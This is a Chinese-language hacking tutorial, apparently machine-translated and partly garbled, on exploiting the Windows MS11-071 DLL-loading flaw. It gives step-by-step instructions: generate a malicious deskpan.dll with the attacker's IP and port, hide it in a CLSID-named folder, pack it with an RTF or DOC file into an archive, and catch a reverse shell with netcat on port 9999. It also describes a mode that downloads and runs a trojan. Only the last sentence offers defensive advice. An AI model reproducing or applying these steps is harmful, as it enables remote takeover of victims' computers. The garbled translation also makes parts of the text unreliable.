漏洞:Windows
脆弱性:黑客的肉鸡
很长一段时间,我们相信。txt,Rtf,.doc这个
文件是相对安全的,但使用ms11-071漏洞,这些文件可能是黑客帮凶mdash;mdash;当
用户运行后,黑客将触发,产生的特殊文件,Windows的漏洞,导致黑客在肉鸡手中。现在我们要测试的漏洞。
第一步:利用ms11-071.exe到根
目录,在C;;;具有菜单;
操作;,cmd
输入;操作;
命令提示符,光标切换到开发
程序目录下,进入ms11-071.exe并按下回车键,你可以看到四种开发方案(图1):
图1
黑客最常用的是第一个和第三个。第一个
方法是发送一个壳到指定的港口
目标主机,使黑客可以
执行任意命令
连接后连接。第三种方式是类似于
下载当用户触发一个漏洞,下载从对应的URL和运行木马。
STEP2:在第一个例子中,在
命令提示符;;进入ms11-071.exe - 1
192.168.1.1 9999(图2),其中192.168.1.1是黑客的
计算机的IP
地址,9999是开放的端口号。在那之后,生成一个文件名为deskpan.dll。
图2
STEP3:
创建一个新文件夹,
重命名为:试验。{ 42071714-76d4-11d1-8b2400a0c9068ff3 },test,和取代它与其他字符。更名后,这两个括号的内容是隐藏的
系统,用户只能看到的文件夹名称;testRTF文件创建一个新的。或.doc文件,然后
打包压缩文件的deskpan.dll。
图3
在这一点上,产生一个恶意文件的
压缩包,这是不够的,而且在使用nc.exe这个小程序,听在命令提示符端口黑客机;NC—输入如下命令;l ndash;P 9999(图3),只要用户在
压缩文件中的文件,它会触发该漏洞,黑客将接收来自用户的计算机在壳壳可以执行任意命令,如创建一个
管理员帐户。
为了防止此漏洞带来的伤害,我们要做两件事:第一,对系统作一个安全补丁,不运行来历不明的WinRAR压缩包。